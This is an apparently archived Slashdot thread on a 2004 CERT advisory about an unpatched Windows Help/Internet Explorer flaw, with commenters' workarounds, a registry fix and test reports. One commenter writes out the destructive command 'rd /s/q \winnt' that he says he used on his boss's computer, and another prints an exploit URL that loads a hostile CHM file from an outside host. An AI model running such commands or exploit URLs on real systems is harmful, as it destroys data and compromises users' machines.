Slashdot Mirror


New Windows Vulnerability in Help System

wesleyt writes "CERT announced today a significant Microsoft Windows vulnerability related to IE and its handling of the Windows help subsystem. There are currently no patches available and no virus definitions for the major scanners. As well, exploits have been reported in the wild. Because the vulnerability is in the help subsystem, even users who avoid Outlook and IE are vulnerable, since IE is the default handler for help files. It seems that this is going to be an ugly one."

29 of 576 comments (clear)

  1. MS by Fredbo · · Score: 5, Funny

    Microsoft is in some serious need of some help on this...

    1. Re:MS by netsharc · · Score: 5, Funny

      "It seems like you're trying to exploit a security hole. Would you like help?"

      --
      What time is it/will be over there? Check with my iPhone app!
  2. Privilege level by Gary+Destruction · · Score: 5, Insightful

    "could allow an attacker to execute arbitrary code with the privileges of the user running IE" This is why you run as a restricted user rather than administrator or power user. Restricted users don't have write or modify permissions to the WINNT or Program Files directories or subdirectories. And they certainly don't have permission to screw with the registry.

    1. Re:Privilege level by Gary+Destruction · · Score: 5, Informative

      Use the runas service to do administrative stuff. You can either use it in command line form or hold down shift and right click on an executable. It works on most control panel applets as well.

    2. Re:Privilege level by goat_attack · · Score: 5, Informative
      Unfortunately many programs and especially games require you have admin access to work, i.e. The Sims (god knows why). Imagine teaching your mother to use one account for installs, and another for her email and browsing, then throw in some stuff that will only work under admin and you'll quickly see where this goes.

      This is a much broader problem than merely stupid/lazy users.

    3. Re:Privilege level by Lukey+Boy · · Score: 5, Insightful

      You realize that's only valid in the context of a corporate setup, right? Most viruses and trojans infest home systems. Of course it's easy to reimage a machine in an office - it's the fabled "Aunt Tillie" we have to worry about.

    4. Re:Privilege level by Halfbaked+Plan · · Score: 5, Insightful

      I used to try running Windows 2000 as a non-privledged user.

      The problem is, not every Windows program out there is written to be aware of the fine-grained security model of Windows NT. In a 'perfect world' every Windows developer would code properly, with security in mind. As it stands, the complex NT security model is just ignored by a lot of people. It might work great in a locked-down corporate environment with a limited-set of software, i.e. where the user isn't allowed to install anything, and the software installed is a narrow well-tested set. It won't ever work in looser environments. Given the lax 'security culture' of Microsoft and it's user base, it's unworkable.

      --
      resigned
    5. Re:Privilege level by pe1chl · · Score: 5, Insightful

      This is like saying that keylocks work well in a bank, but will never be workable in normal life. People will lose keys, will find it uncomfortable to carry keyrings, etc.

      Sure there is some truth in that, but as more and more people don't respect other people's property, keylocks have become a necessity and have to be lived with, no matter the discomfort.

      The same is now happening with software security.

    6. Re:Privilege level by ymgve · · Score: 5, Interesting

      Games need Administrator privileges because the copy protection systems use driver tricks that are only available to administrators. Yet another reason why copy protection should be abolished.

  3. Windows XP SP2 by Anonymous Coward · · Score: 5, Informative

    Although there's no specific patch, the Windows XP SP2 release candidate mitigates this problem.

  4. Horrible by S.I.O. · · Score: 5, Funny

    > and no virus definitions for the major scanners

    Jesus, even my ScanJet is vulnerable?

  5. Today? by Troed · · Score: 5, Informative

    They announced this TODAY? It has been discussed on Bugtraq for weeks - and due to a few comments I made in their discussion forum the Swedish IDG.se reported this last Friday. I've also linked to one of the PoC-exploits here on Slashdot for people check for themselves. ... what took them so long?

    Jelmer's PoC is good: link

    (That page is the info page, you won't get hit by clicking on the link directly)

  6. start the stopwatch... by rapiddescent · · Score: 5, Insightful

    now would be a very good time to start the clocks to see how long it takes them to get a patch out. Should be a good case in point for the forrester research published last week. rd

    1. Re:start the stopwatch... by exmsfty · · Score: 5, Interesting

      Well, the interesting thing to me is I was a contract tester on the HTMLHELP team in 1999...and I filed a bug report for this very exploit. So by my stopwatch we are at 5 years and counting. FWIW, I used this exploit to nuke my boss's computer via the "Goodtimes" virus...yea, it was a hoax, but with this exploit I could run "rd /s/q \winnt" from the Preview Pane of Outlook :) If you care then write ShaneMc@microsoft.com and ask him why it wasn't fixed 5 years ago.

  7. Afraid by InternationalCow · · Score: 5, Interesting

    I don't know about the rest of you, but things like these are actually scaring me out of running Windows. Apart from my powerbooks (no problems there) I have one PC laptop on which I run WinXP and Linux and I like to use Windows for its ACPI support, but I'm now constantly afraid that some as yet undescribed security hole will allow someone to screw up my computer/home network. Brrrr. No Windows any longer, I'm sick and tired of being afraid when using my computer.

    --
    ----- One learns to itch where one can scratch.
  8. Workaround by KingRob · · Score: 5, Informative

    Remember to backup your registry (or at least this portion of it)
    From the CERT article:

    Currently, there is no complete solution for this vulnerability. Until a patch is available, consider the workarounds listed below.

    Disable ITS protocol handlers
    Disabling ITS protocol handlers appears to prevent exploitation of this vulnerability. Delete or rename the following registry keys:

    HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Ha nd ler\{ms-its,ms-itss,its,mk}
    Disabling these protocol handlers will significantly reduce the functionality of the Windows Help system and may have other unintended consequences. Plan to undo these changes after patches have been tested and installed.

    Follow good Internet security practices
    These recommended security practices will help to reduce exposure to attacks and mitigate the impact of cross-domain vulnerabilities.

    Disable Active scripting and ActiveX controls

    NOTE: Disabling Active scripting and ActiveX controls will not prevent the exploitation of this vulnerability.

    Disabling Active scripting and ActiveX controls in the Internet and Local Machine Zones may stop certain types of attacks and will prevent exploitation of different cross-domain vulnerabilities. Disable Active scripting and ActiveX controls in any zones used to read HTML email.

    Disabling Active scripting and ActiveX controls in the Local Machine Zone will prevent malicious code that requires Active scripting and ActiveX controls from running. Changing these settings may reduce the functionality of scripts, applets, Windows components, or other applications. See Microsoft Knowledge Base Article 833633 for detailed information about security settings for the Local Machine Zone. Note that Service Pack 2 for Windows XP includes these changes.

    Do not follow unsolicited links
    Do not click on unsolicited URLs received in email, instant messages, web forums, or Internet relay chat (IRC) channels.

    Maintain updated anti-virus software
    Anti-virus software with updated virus definitions may identify and prevent some exploit attempts. Variations of exploits or attack vectors may not be detected. Do not rely solely on anti-virus software to defend against this vulnerability. More information about viruses and anti-virus vendors is available on the US-CERT Computer Virus Resources page.

  9. Use the RUNAS service by Gary+Destruction · · Score: 5, Informative

    The RUNAS service will allow you to run an executable with elevated privileges. And shortcuts have the option to run as a different user by clicking the check box that says,"Run as different user." To use the RUNAS service, just hold down shift and right-click and you'll see an option that says "Run As".

  10. This is point in fact... by tuxlove · · Score: 5, Insightful

    ... that not publishing vulnerabilities doesn't stop exploits. This one had exploits long before the vulnerability was known to anyone but the hackers. I have to laugh every time MS whines about how problems would go away if vulnerabilities were never disclosed, except to the vendor of course. The only thing that might go away is the bad PR, if even that.

  11. Re:I know, I know.. by heironymouscoward · · Score: 5, Insightful

    At the risk of replying to a Microsoft troll, this is not a "pretty insignificant" story.

    Errors in server-side applications are rapidly fixed by serious system administrators and at the worst they provide attackers a way into unprotected systems. How many computers around the world are currently infected or zombied thanks to holes in any of the programs you cited? Almost zero.

    Security holes in client-side applications (MSIE, Outlook, primarily) are a totally different story. These programs are mainly used by people who don't have the capacity to protect their systems. And the results are clear: millions of PCs infected by everything from viruses to worms and spywares, used as platforms to launch DDoS attacks, to send spam, to steal information...

    There is a real security problem on the Internet, one that is making a joke of the "information highway", and it's almost entirely caused by vulnerabilities like the one reported here.

    Until the market leader realizes that its users need serious protection from the malicious forces who roam the Internet, no amount of criticism is too much. And, if you really want to support and defend Microsoft, you should be adding your voice, because it is this issue - its failure to provide its users with a safe platform - which will be its downfall.

    "Microsoft = insecure" is an association that should be sending shivers down the backs of those marketing managers trying to bomb the web with billions of Microsoft adverts.

    --
    Ceci n'est pas une signature
  12. well by circletimessquare · · Score: 5, Funny

    i loaded up ie, went help... contents and index... search... and typed in"help subsystem vulnerable" and hit list topics

    a pop up box announced "no topics found"

    so what is everyone talking about? this doesn't seem to be a problem

    --
    intellectual property law is philosophically incoherent. it is your moral duty to ignore it or sabotage it
  13. Administrators: quick fix by AnonymousDot · · Score: 5, Informative
    Create a .REG file with this content:
    REGEDIT4

    [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ PROTOCOLS\Handler\its]
    [-HKEY_LOCAL_MACHINE\SOFTW ARE\Classes\PROTOCOLS\Handler\mk]
    [-HKEY_LOCAL_MA CHINE\SOFTWARE\Classes\PROTOCOLS\Handler\ms-its]
    [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Ha ndler\ms-itss]
    Remove the spaces that slashcode adds!

    Save it as chm-disable.reg
    Put a line like this in your logon script:
    regedit /s chm-disable.reg
    Use the same trick to restore the values when a patch is available (that means that you must save the HANDLER keys first).
    Note: If you're still using batch files: KiXtart is your friend!
  14. Mod Parent UP! by Chordonblue · · Score: 5, Interesting

    Where's my friggin points when I need them?

    Look, this is absolutely true. There is still plenty of software out there that breaks under W2K/WXP when not run as a local administrator.

    And forget 'looser' environments. I run a network at a private school. Care to take a guess how much educational software cares about following the rules properly? Grrr!!!

    --
    "...Well, there's egg and bacon; egg sausage and bacon; egg and spam; egg bacon and spam; egg bacon sausage and spam..."
  15. But but but... by Jesrad · · Score: 5, Informative

    ...but Mr MS-Security himself said that there were NO exploits prior to the security patches !

    --
    Maybe we deserve this world ?
  16. Re:Actually, mac users haven't had a virus yet by thesupraman · · Score: 5, Insightful

    Taken from Sophos....

    http://www.sophos.com/virusinfo/analyses/index_m ac exe.html

    Description: Macintosh file virus

    666, see Mac/Sevendust-A
    ANTI-A, see Mac/ANTI-A
    CDEF, see Mac/CDEF
    CODE-1, see Mac/CODE-1
    CODE-252, see Mac/CODE-252
    CODE-9811, see Mac/CODE-9811
    ERIC, see Mac/Scores
    Garfield, see Mac/MDEF-A
    Graphics Accelerator, see Mac/SevenD-Fam
    INIT-1984, see Mac/INIT-1984
    INIT-29, see Mac/INIT-29
    INIT-9403, see Mac/INIT-9403
    INIT-M, see Mac/INIT-M
    Mac/ANTI-A
    Mac/CDEF
    Mac/CODE-1
    Mac/ CODE-252
    Mac/CODE-9811
    Mac/INIT-1984
    Mac/INIT-2 9
    Mac/INIT-9403
    Mac/INIT-M
    Mac/MBDF-A
    Mac/MBDF -B
    Mac/MDEF-A
    Mac/nVIR-A
    Mac/nVIR-B
    Mac/nVIR-F am
    Mac/Scores
    Mac/SevenD-C
    Mac/SevenD-D
    Mac/Se venD-Fam
    Mac/Sevendust-A
    Mac/Sevendust-B
    Mac/Se vendust-J
    Mac/T4
    Mac/WDEF
    Mac/ZUC-A
    MBDF-A, see Mac/MBDF-A
    MBDF-B, see Mac/MBDF-B
    MDEF 666, see Mac/Sevendust-A
    MDEF 9806, see Mac/Sevendust-A
    MDEF-A, see Mac/MDEF-A
    NASA VULT, see Mac/Scores
    nVIR-A, see Mac/nVIR-A
    nVIR-B, see Mac/nVIR-B
    nVIR-Fam, see Mac/nVIR-Fam
    San Jose Flu, see Mac/Scores
    Scores, see Mac/Scores
    SevenD-C, see Mac/SevenD-C
    SevenD-D, see Mac/SevenD-D
    SevenD-Fam, see Mac/SevenD-Fam
    Sevendust-A, see Mac/Sevendust-A
    Sevendust-B, see Mac/Sevendust-B
    Sevendust-J, see Mac/Sevendust-J
    SysX, see Mac/INIT-9403
    T4, see Mac/T4
    WDEF, see Mac/WDEF
    ZUC-A, see Mac/ZUC-A

  17. Not the point by bangular · · Score: 5, Insightful

    That's not the point. MS has tried to lead the public to believe that there's never been an instince of exploit code before their patch. And obviously if there's exploit code out there, something already "really bad" has happened. This comes after the witty worm spread before ISS had patches for their products.

    On a related note, MS pretty much NEVER releases advisory's on their own will before a patch. There almost always has to be a 3rd party that has said they are going to go public, or there have to be exploits or information in the wild. With that information, I wonder if this exploit is related to the windows source leak. The source leak had a lot of IE code, and if there are exploits in the wild before MS could even send out an advisory. That would lead me to the possiblity that the windows source leak could be the source of this one.

    1. Re:Not the point by Vancorps · · Score: 5, Insightful
      The code was for IE5, this is very unlikely. And a patch is available, its called shutting off the help sub-system. With Windows 2000 and XP it is a service, one which I never use, although I'm sure some people do.

      As for MS statements about exploits, well... everyone knows that's just plain silly. Right now there is an Exchange vulnerability listed on CERT that contains no patch and several known exploits, has been that way since November.

      This is yet another occasion to teach everyone how to run as a user in Windows and not as Administrator. Almost everything is negated or at least mitigated when they are just normal users. Sure it could wipe out their own documents, but it couldn't effect any others and certainly couldn't harm the operating system.

      I see this problem a lot on every platform, generally I think people like to feel in control all the time

  18. Re:What browser to use? by pedrop357 · · Score: 5, Informative

    I played with fire and tested the PoC found here

    In IE, it copied itself over wmplayer.exe, SFP copied the original back, but that was enough for me. Firefox 0.8, OTOH, didn't budge and nothing happened to wmplayer.exe. Same thing with Netscape 7.1 and Opera 7.23.

    At least in this case, IE seems to be the only one.

  19. Quick tests on some Windows XP systems by Kagami001 · · Score: 5, Informative

    I ran a few quick tests on a couple of different Windows XP systems using the proof of concept exploit code here.

    ---------
    Windows XP Professional Service Pack 1

    Mozilla Firebird 0.8 run as limited user: no apparent effect
    Mozilla Firebird 0.8 run as administrator: no apparent effect

    Internet Explorer 6 run as limited user causes an Internet Explorer Script Error:

    Line 47, Char: 5, Error: Write to file failed, Code: 0
    URL: ms-its:mhtml:file://C:\foo.mht!http://ip3e83566f.s peed.planet.nl/security/newone/modified//EXPLOIT.C HM::/exploit.htm

    Internet Explorer 6 run as administrator: demo exploit runs as expected

    A software restriction policy is in place on this machine, forbidding the execution of any executable files (including .chm) in any directories except for the ProgramFilesDir and System directories, but, as you can see, it did not stop the sample code from executing when IE was run with administrator privileges.
    ------------

    Windows XP Professional Service Pack 2 RC 1

    Internet Explorer 6 run as administrator: no apparent effect

    Fixed in SP2?
    ---------------

    One thing that concerns me about using this particular sample code as a test, is that it seems to rely on having write permission to \Program Files, thus requiring administrator privileges (usually) and thus making limited user accounts appear to be invuelnerable -- but are they? Can a version of this exploit be written that runs even if the user does not have write privileges to the program files and system directories? (Thus giving access to all of the limited user's files.) In such a case, would software restriction policies prevent the execution of the exploit exe even if not stopping the script itself?

  20. In Linux-land... by gosand · · Score: 5, Funny

    Imagine teaching your mother to use one account for installs, and another for her email and browsing, then throw in some stuff that will only work under admin and you'll quickly see where this goes.

    Somewhere in Linux-land, a phone rings....

    Hello? Oh, hi mom. Yeah, I can help you install a program on your computer. What do you want to install? Oh, cool. Have you downloaded it? Good job. OK, open up a terminal.... it's a command line interface, where you type commands. Much more powerful than a GUI. Where did you save the file? You don't remember? Hmm. Just type "cd". Now type "ls". Do you see the file name? Great! OK, type "tar -zxf "

    It didn't work? What does it say? OK. What is the name of the file you downloaded? Oh, well, that is a bzip file, not a tar and gzipped file. So type the same thing as before, but use "bzip2" instead of "tar".

    What? Why didn't it work? Oh, it doesn't have the same syntax. Crap. Go to the man page. Oh, man stands for manual. Type "man bzip2". What does it say?

    (20 minutes later)

    OK, now we have uncompressed the files you need. No, not yet. Type "./configure" No, it's OK, it is figuring out what kind of computer and software you have.

    OK, now type "make" OK, call me back when it is done.

    (15 minutes later)

    OK, now type "make install" What? Why not? What does it say? No, not that. Oh, wait, you have to be root. It is an administrator user.
    Because not just everyone can install programs, for security reasons. Look, just change to the admin user by typing "su". OK, now enter the root password. I DON'T KNOW! You mean you don't know your root password?

    (10 minutes later)

    Mom, you should NOT use the dog's name as the password. Because it is insecure! Nevermind. Just type "make install". There. Now it is installed.

    No, there is no icon, you have to type the name of program to run it. Type it. What? I don't know, what was the name of the binary after you compiled it? A binary file is a program you run. You compiled it when you typed "make". Hmm, let's look in the Makefile. Type "vi Makefile". What do you mean it is blank? Oh, wait. Use capital M. Type ":r Makefile" with a capital M.

    OK, now you are in vi, the most powerful editor ever. WHAT DO YOU MEAN YOU PREFER EMACS!!!!

    --

    My beliefs do not require that you agree with them.